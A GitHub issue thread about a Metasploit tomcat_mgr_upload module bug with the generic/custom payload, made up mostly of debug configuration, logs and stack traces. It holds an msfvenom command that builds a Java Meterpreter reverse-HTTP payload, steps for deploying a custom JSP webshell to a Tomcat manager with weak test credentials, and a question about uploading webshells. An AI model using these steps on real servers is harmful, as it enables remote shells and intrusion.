multi/http/tomcat_mgr_upload doesn't support generic/custom payload

[theguly]

I'm testing generic/custom as a payload for exploit/multi/http/tomcat_mgr_upload and looks like it doesn't work as I expected:

msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Retrieving session ID and CSRF token...
[*] Finding CSRF token...
[*] Uploading and deploying CX2BtqaO4o7RoKx4Tj3u...
[-] Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass
[*] Exploit completed, but no session was created.

I have used the same method to run other exploit, for example exploit/multi/ssh/sshexec , and I had the payload run smoothly.

Steps to reproduce

1. create a raw payload, i started with a custom zip file with my own jsp webshell but msfvenom can be used as well: msfvenom -p java/meterpreter/reverse_http LHOST=127.0.0.1 LPORT=4545 -f raw > /root/reverse.raw
2. verify it's a valid zip file, even unzipping it
3. use and configure exploit:
4. use exploit/multi/http/tomcat_mgr_upload
5. set payload generic/custom
6. set PAYLOADFILE /root/reverse.raw
7. exploit

of course the extension doesn't matter, i tried .zip and .war/.jar anyway

Expected behavior

I'd expect that my reverse.raw is used as payload for the exploit, resulting in a new custom application deployed

Current behavior

the payload cannot be decoded/unpacked

Metasploit version

Framework: 6.2.9-dev Console : 6.2.9-dev

[adfoster-r7]

Thanks for raising an issue :+1:

Would you mind running setg loglevel 3, running your replication steps again, then providing the value of the debug command? i.e. these Additional Information steps here: https://github.com/rapid7/metasploit-framework/blob/c447cc53fd12a488417e34ecbb6eac6777c0fad5/.github/ISSUE_TEMPLATE/bug_report.md#additional-information

What tomcat version are you targeting?

[theguly]

i've deployed a tomcat9 from kali repository and set up some weak creds on my local system. running the exploit with a straight set payload java/meterpreter/reverse_http works, IMHO the issue is very before trying to reach the remote target.

there are also some useless info about a missing psql and errors about a payload that is listed as supported but it isnt (java/jsp_shell_bind_tcp , will open another ticket later), but that's debug output:

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/multi/http/tomcat_mgr_upload

[multi/http/tomcat_mgr_upload]
WORKSPACE=
VERBOSE=true
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=127.0.0.1
RPORT=8080
VHOST=
SSL=false
Proxies=
UserAgent=Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1
HttpUsername=tomcat
HttpPassword=s3cret
HttpRawHeaders=
DigestAuthIIS=true
SSLVersion=Auto
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpTrace=false
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
SSLServerNameIndication=
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::shuffle_get_params=false
HTTP::shuffle_post_params=false
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
TARGETURI=/manager
PAYLOAD=generic/custom
LHOST=[CUT]
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
JavaMeterpreterDebug=false
Spawn=2
AESPassword=
AutoLoadStdapi=true
AutoVerifySessionTimeout=30
AutoRunScript=                                                                                                                                                 [119/2374]
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
MeterpreterDebugBuild=false
MeterpreterDebugLogging=
PLATFORM=
ARCH=
PAYLOADFILE=/root/reverse.war
PAYLOADSTR=
LURI=
OverrideRequestHost=false
OverrideLHOST=
OverrideLPORT=
OverrideScheme=
HttpUserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
HttpServerName=Apache
HttpUnknownRequestResponse=<html><body><h1>It works!</h1></body></html>
IgnoreUnknownPayloads=false
StagerURILength=
HttpHostHeader=
HttpCookie=
HttpReferer=
CreateSession=true
CommandShellCleanupCommand=
AutoVerifySession=true
SHELL=

Database Configuration

The database contains the following information:

Collapse

Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

Collapse

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse

[08/01/2022 12:15:20] [e(0)] core: Failed to connect to the database: connection to server at "::1", port 5432 failed: Connection refused
        Is the server running on that host and accepting TCP/IP connections?

connection to server at "127.0.0.1", port 5432 failed: Connection refused
        Is the server running on that host and accepting TCP/IP connections?

[08/01/2022 12:15:21] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/01/2022 12:15:21] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/01/2022 12:15:21] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/01/2022 12:15:26] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined meth
od `unpack' for nil:NilClass
[08/01/2022 12:16:59] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined meth
od `unpack' for nil:NilClass
[08/01/2022 12:17:10] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined meth
od `unpack' for nil:NilClass
[08/01/2022 12:17:13] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined meth
od `unpack' for nil:NilClass
[08/01/2022 12:31:50] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined meth
od `unpack' for nil:NilClass
Call stack:
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1514:in `to_jsp'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1530:in `to_jsp_war'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:465:in `encoded_war'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:299:in `war_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:351:in `upload_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:152:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[08/01/2022 12:32:43] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined meth
od `unpack' for nil:NilClass
Call stack:
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1514:in `to_jsp'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1530:in `to_jsp_war'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:465:in `encoded_war'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:299:in `war_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:351:in `upload_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:152:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse

[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell/reverse_tcp with multi/http/tomcat_mgr_upload]: noconn to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell/reverse_tcp with multi/http/tomcat_mgr_upload]: none to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell/reverse_tcp with multi/http/tomcat_mgr_upload]: tunnel to reverse
[08/01/2022 12:32:30] [d(1)] core: Module java/shell/reverse_tcp is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: reverse to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: bind to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: noconn to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: none to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: tunnel to reverse
[08/01/2022 12:32:30] [d(1)] core: Module java/shell_reverse_tcp is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: reverse to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: bind to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: noconn to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: none to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: tunnel to tunnel
[08/01/2022 12:32:30] [d(1)] core: Module multi/meterpreter/reverse_http is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: reverse to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: bind to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: noconn to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: none to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: tunnel to tunnel
[08/01/2022 12:32:30] [d(1)] core: Module multi/meterpreter/reverse_https is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: reverse to none
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: bind to none
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: noconn to none
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: none to none
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: tunnel to none
[08/01/2022 12:32:33] [d(1)] core: Module generic/custom is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:43] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined meth
od `unpack' for nil:NilClass
Call stack:
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1514:in `to_jsp'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1530:in `to_jsp_war'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:465:in `encoded_war'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:299:in `war_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:351:in `upload_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:152:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse

Framework: 6.2.9-dev
Ruby: ruby 3.0.4p208 (2022-04-12 revision 3fa771dded) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.3 3 May 2022
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify

[adfoster-r7]

From what I understand, the generic/custom payload is meant to take custom executable files (i.e. exe/elf/macho) as tomcat_mgr_upload will always wrap the payload as an encoded_war. In this scenario you're not providing an exe file - so it's dying with a very unclear exception. I think we could add extra validation here to handle the scenario of the file not being an exe/elf/etc.

What's the rationale between generating your own Meterpreter payload separately and using generic/custom, versus just using set payload java/meterpreter/reverse_http directly?

[theguly]

From what I understand, the generic/custom payload is meant to take custom executable files (i.e. exe/elf/macho) as tomcat_mgr_upload will always wrap the payload as an encoded_war. In this scenario you're not providing an exe file - so it's dying with a very unclear exception. I think we could add extra validation here to handle the scenario of the file not being an exe/elf/etc.

apart from a more clear error message regarding the file format, you mean that it's not possible to use generic/custom with any exploit that doesn't run elf/exe/macho because of how the payload works, isn't it?

What's the rationale between generating your own Meterpreter payload separately and using generic/custom, versus just using set payload java/meterpreter/reverse_http directly?

probably i'm just unlucky because i was testing generic/custom and i looked for an exploit with a target easy to setup. i guess i choosed the wrong exploit candidate :D

thinking about it, it happened to me long time ago that a tomcat server with weak creds for the manager wasn't allowed to open new connections so any reverse shell was out of the way. bindshells are out of the way too, and for that vulnerability this ruled out metasploit at all even for the pure exploitation.

[theguly]

@adfoster-r7 do you think there is another way to have uploaded a custom webshell using such exploit? I mean, having a less picky generic/custom payload

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.